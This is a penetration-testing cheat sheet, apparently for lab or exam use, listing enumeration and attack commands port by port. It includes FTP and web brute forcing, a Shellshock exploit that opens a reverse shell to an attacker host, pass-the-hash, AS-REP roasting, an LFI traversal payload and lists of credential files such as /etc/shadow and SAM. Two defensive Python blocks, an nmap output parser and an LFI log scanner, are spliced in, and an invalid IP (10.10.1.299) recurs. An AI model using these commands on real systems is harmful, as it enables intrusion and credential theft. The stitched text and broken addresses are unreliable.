Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
            - FIND AVAILABLE NETWORK CONNECTIONS
                nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21          - FTP
            Try anonymous logins
-----------------------------------------------------------------------------
25          - SMTP (EMAIL)
                telnet 10.11.1.72 25
                VRFY user
                FINISH SESSION:  Ctrl + ] / close
                VULN - SHELLSHOCK - need valid email address
                python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110         - POP
143         - IMAP
587         - SECURE EMAIL (SMTP SUBMISSION)
                nc -nv 10.11.1.72 25
                nc -nvC 10.11.1.72 110
                USER enter-user
                PASS enter-pass
-----------------------------------------------------------------------------
80 / 443    - WEB
                dirb / dirbuster / gobuster / nikto / curl
                RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464    - KERBEROS
                pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111         - NFS mounts (showmount -a <ip> / showmount -e <ip>)
-----------------------------------------------------------------------------
135         - RPC: Remote Procedure Call
                impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445   - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
                nmap --script nbstat.nse <ip>
                nmap --script smb-os-discovery  <ip>
                nmap --script smb-enum-shares -p139,445 <ip>
                nmap --script "smb-vuln*" <ip>
                'net' command on kali
                crackmapexec smb <ip> -u <user> -p <pass>
                rpcclient -U '' -N <ip>
                impacket-lookupsid <domain>/<user>:<pass>@<ip>
                enum4linux -a <ip>
                ---------------------------------------------------------------
                CIFS (OLD: WINDOWS NT 4.0)
                SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
                SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
                SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
                SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
                SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
                SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433        - MSSQL
                nmap --script "ms-sql*" -p1433 <ip>
                sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268  - LDAP (INDICATOR OF DC)
                nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse 
                nmap -p 389 --script ldap-search <ip>
                dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220 
                impacket-GetNPUsers thinc/<user>:<pass> -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------   
3389        - RDP
            rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
            evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------

NMAP QUICK SEARCH

nmap -sn -oG results.txt 10.X.X.0/24
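The -oG flag in the sweep above writes nmap's grepable format into results.txt: one "Host: ip (name)" line per host, followed by tab-separated "Key: value" fields. As an added example (not part of this cheat sheet and not nmap's own code), the Python below parses that format into a host inventory. It also handles the "Ports:" field that -oG writes when combined with a port scan, which goes beyond the ping sweep shown; the sample text is constructed, not captured from a real network.

```python
import ipaddress
import re

# Constructed sample of nmap grepable (-oG) output. The first three Host lines
# are what a ping sweep (-sn) writes; the fourth carries a Ports: field as a
# port scan would write it, so both branches of the parser get exercised.
SAMPLE_OG = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sn -oG results.txt 10.0.0.0/24
Host: 10.0.0.1 (gateway.example.test)\tStatus: Up
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.7 ()\tStatus: Down
Host: 10.0.0.9 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (997)
# Nmap done at Mon Jan  1 10:00:03 2024 -- 256 IP addresses (3 hosts up) scanned in 3.21 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
# Each Ports entry is port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/[^/]*/")


def parse_grepable(text):
    """Parse -oG text into {ip: {"hostname", "up", "open_ports"}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '# Nmap ...' comment lines and anything else
        ip, hostname = m.groups()
        entry = hosts.setdefault(ip, {"hostname": hostname, "up": False, "open_ports": []})
        # Remaining fields are tab-separated "Key: value" pairs.
        for field in line.split("\t")[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value.strip() == "Up"
            elif key == "Ports":
                entry["up"] = True  # only responding hosts get a Ports field
                for port, state, proto, service in PORT_RE.findall(value):
                    if state == "open":
                        entry["open_ports"].append((int(port), proto, service))
    return hosts


def live_hosts(text):
    """IPs reported up, sorted numerically rather than as strings."""
    return sorted((ip for ip, h in parse_grepable(text).items() if h["up"]),
                  key=ipaddress.ip_address)


def open_port_inventory(text):
    """{ip: [(port, proto, service), ...]} for hosts with at least one open port."""
    return {ip: h["open_ports"] for ip, h in parse_grepable(text).items() if h["open_ports"]}


if __name__ == "__main__":
    hosts = parse_grepable(SAMPLE_OG)
    for ip in live_hosts(SAMPLE_OG):
        h = hosts[ip]
        ports = ", ".join(f"{p}/{proto} {svc}" for p, proto, svc in h["open_ports"]) or "-"
        print(f"{ip:<15} {h['hostname'] or '-':<25} {ports}")
```

Point it at a real results.txt with `parse_grepable(open("results.txt").read())`; comparing two runs' `live_hosts()` output is a cheap way to spot hosts that appeared on the network since the last sweep.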

FTP
PORT 21

…simply use “anonymous” with no password to start, then enumerate

ftp <ip>
user: anonymous
pass: <just hit enter>

hydra -L users.txt -P passwords.txt ftp://10.10.1.299

ncrack -U users.txt -P passwords.txt ftp://10.10.1.299 

patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt

EMAIL
PORT 25 - SMTP

telnet <ip> 25
VRFY user
Ctrl + ]  # THIS IS TO CLOSE YOUR SESSION

…possible attack vector is SHELLSHOCK

python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT

# MAY REQUIRE A VALID EMAIL ADDRESS (<email> IS A PLACEHOLDER)
python2 postfix-shellshock-nc.py 10.10.1.229 <email> 192.168.119.229 443

PORT 110 - POP
PORT 143 - IMAP
PORT 587 - SECURE EMAIL (SMTP SUBMISSION)

nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass

WEB
PORT 80
PORT 443

…web server ports
…multiple attack vectors

dirb http://10.10.1.299

dirb http://10.10.1.299:8080 -o file.txt  # SCAN ANOTHER PORT BY PUTTING IT IN THE URL (dirb's -p/-P ARE PROXY OPTIONS, NOT A PORT)

dirbuster  # GUI USED TO ENUMERATE

gobuster dir -u http://10.10.1.299:8080 -w /usr/share/wordlists/dirb/big.txt

medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin

REMOTE FILE INCLUSION

LOCAL FILE INCLUSION

SQL INJECTION

# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password

…for LFI, you can look for very common files on a system

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

WINDOWS
C:\windows\win.ini 
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab
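The file lists above double as a watch list for defenders. As an added example (not from the original cheat sheet), the Python below scans web-server access-log request lines for traversal sequences, including the backslash and double-percent-encoded forms that a filter checking only for "../" would miss, and for references to the sentinel files listed above, modelled on the loadImage URL. The log lines, client addresses and hostnames are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Sentinel files taken from the Windows/Linux lists above (lowercased, forward
# slashes). Naming one of these in a request parameter is suspicious even
# without an explicit "../" sequence.
SENSITIVE_FILES = (
    "win.ini", "system.ini", "drivers/etc/hosts", "config/sam", "repair/sam",
    "unattended.xml", "sysprep.inf", "/etc/passwd", "/etc/shadow", "/etc/crontab",
)
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")
# Request line inside an Apache/nginx combined-format log entry.
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) (HTTP/[\d.]+)"')

# Constructed log lines; the hostile ones follow the loadImage URL pattern above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /loadImage?filename=cat.png HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /loadImage?filename=..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 403',
    '10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /loadImage?filename=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /docs/readme..txt HTTP/1.1" 200 90',
]


def normalize(value, rounds=3):
    """Percent-decode repeatedly (catches double encoding), fold backslashes
    to slashes and lowercase, so one pattern covers Windows and Linux forms."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.replace("\\", "/").lower()


def inspect_target(target):
    """Return [(where, reason), ...] for one request target such as
    '/loadImage?filename=..%5Cwin.ini'; an empty list means nothing suspicious."""
    findings = []
    parts = urlsplit(target)
    candidates = [("<path>", parts.path)]
    candidates += parse_qsl(parts.query, keep_blank_values=True)
    for where, raw in candidates:
        norm = normalize(raw)
        if TRAVERSAL_RE.search(norm):
            findings.append((where, "path traversal"))
        for sentinel in SENSITIVE_FILES:
            if sentinel in norm:
                findings.append((where, f"references {sentinel}"))
                break
    return findings


def scan_log(lines):
    """Return [(client_ip, target, findings), ...] for log lines worth a look."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = inspect_target(m.group(2))
        if findings:
            hits.append((line.split(" ", 1)[0], m.group(2), findings))
    return hits


if __name__ == "__main__":
    for client, target, findings in scan_log(SAMPLE_LOG):
        print(client, target)
        for where, reason in findings:
            print(f"    {where}: {reason}")
```

The "readme..txt" line is there to show that a pair of dots inside a filename is not flagged: the traversal pattern only fires when ".." is a whole path segment. Decoding is capped at three rounds so a log entry cannot make the scanner loop on pathological input.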

KERBEROS - WINDOWS ENVIRONMENTS
PORT 88
PORT 464

…pass the hash is a common vector
…credentials must be known

pth-winexe -U WORKGROUP/User%Pass //10.10.1.299 cmd.exe

NETWORK FILE SYSTEM (NFS)
PORT 111

…you’re looking for shared drives

showmount -a <ip>
showmount -e <ip>

REMOTE PROCEDURE CALL (RPC)
PORT 135

…can reveal information about a system
…usually shows installed programs / modules

impacket-rpcdump <ip>

SAMBA (SMB)
PORT 139
PORT 445

…multiple enumeration techniques are available
…different versions will require different attack vectors

nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script "smb-vuln*" <ip>
'net' command on kali
crackmapexec smb <ip> -u <user> -p <pass>
rpcclient -U '' -N <ip>
impacket-lookupsid <domain>/<user>:<pass>@<ip>
enum4linux -a <ip>

…it’s important to note Samba versions

CIFS (OLD: WINDOWS NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10

MICROSOFT SQL (MSSQL)
PORT 1433

…try to scan and connect
…the ‘sa’ account is usually an admin account

nmap --script "ms-sql*" -p1433 <ip>
sqsh -S 10.10.1.299 -U sa

LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL (LDAP)
PORT 389
PORT 3268

…very useful to Active Directory environment enumeration

nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.10.1.299
impacket-GetNPUsers domain/<user>:<pass> -dc-ip 10.10.1.299 -request

REMOTE DESKTOP PROTOCOL (RDP)
PORT 3389

…connection requires credentials

rdesktop -u <user> -p <pass> <host>

WINDOWS REMOTE MANAGEMENT (WINRM)
PORT 5985
PORT 5986

…connection requires credentials

evil-winrm -u <user> -p <pass> -i <host>